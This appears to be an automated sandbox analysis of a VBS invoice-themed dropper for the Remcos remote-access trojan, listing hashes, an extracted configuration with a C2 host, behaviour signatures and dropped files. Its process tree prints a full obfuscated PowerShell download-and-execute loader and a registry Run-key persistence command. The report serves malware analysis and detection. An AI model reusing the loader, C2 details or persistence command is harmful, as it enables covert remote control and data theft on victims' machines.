Overview

overview

10

Static

static

1

IMGRO Fact...do.vbs

windows7-x64

10

IMGRO Fact...do.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    240s
  • max time network
    245s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21/10/2024, 16:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs

  • Size

    28KB

  • MD5

    a8da570deac5f16a0050802c0da5d7dd

  • SHA1

    9d8992e3770e41d8a431350e1cef73492dc240ea

  • SHA256

    c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d

  • SHA512

    7731d4d019eb8e3cfa5e2e5d5802e4033cf289134c15c3a237bcfd7559ab964265b82b825b65451a21703f441619081b9be46767923fb7f662aa12a86e997730

  • SSDEEP

    384:XrCiU16HKM4O+pbHLipRBP1Mv4Uwz+3S0KLV5Zsk+PNngq:Xen6HspbH2xdoftaV5Ck4N7

Score
10/10
remcosmiss chydiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TXCR8B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:3004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1832
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1208

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    74976045a25926655a8976d0ab59a648

    SHA1

    6471236ed9ed2cce34b3019d0a5a94c182112d1b

    SHA256

    df9c1bad68298244da4b6bdcbd7320f39f9d7d790a43438ab72fb9dd61dae5b1

    SHA512

    7913961f70057da12788dfdc10f22fa3b6fc6a97acaf71e755e86214c0e30007b7039945e6bdc231905d100e8d74170bfcfbdb866dc2a38a8e105523f1cae311

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabB849.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarA4D8.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Clothesman.Vin
    Filesize

    475KB

    MD5

    87ff833a255506114faa969869e18546

    SHA1

    86316d90af91a20bffd5a586e7ae94befe65651d

    SHA256

    47a1ffa66a690b0adcf95f5a2141629e112ede25f80dda1adeb4f846f2d14beb

    SHA512

    6c484170c56d52f1f1786c8eb18ccbebb138c8a1f90b57c509c1e7d5a9fcf1bccecd4e0754df6836d9602651094c02c3c58d3c3d0d72b25451952a1dc8091509

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8NOWPAAVYIZEUIUUO0QH.temp
    Filesize

    7KB

    MD5

    759d61910ceabdcccabf742ee946ed56

    SHA1

    029b8b74a9e751440f7c98570b80fb20772b343f

    SHA256

    ed8b1ea20d3c9cba45f372a3e7500deaf2166cd9876f7a114ced4b8b44303ac0

    SHA512

    abc74ccfe5c7098f1528406cbd36dc932f22946dd103f75b54f97d21a1fe9acf18d247cdb90bd0890487c95cd5b79c7dd194b71f4695dfe4ec7438244be5f467

    Download Submit

  • memory/2040-53-0x0000000000460000-0x00000000014C2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2040-51-0x0000000000460000-0x00000000014C2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2596-33-0x0000000006240000-0x0000000009A20000-memory.dmp

    Filesize

    55.9MB

    Download

  • memory/2784-23-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-29-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-26-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-25-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-24-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-22-0x0000000001F40000-0x0000000001F48000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2784-21-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2784-20-0x000007FEF4ACE000-0x000007FEF4ACF000-memory.dmp

    Filesize

    4KB

    Download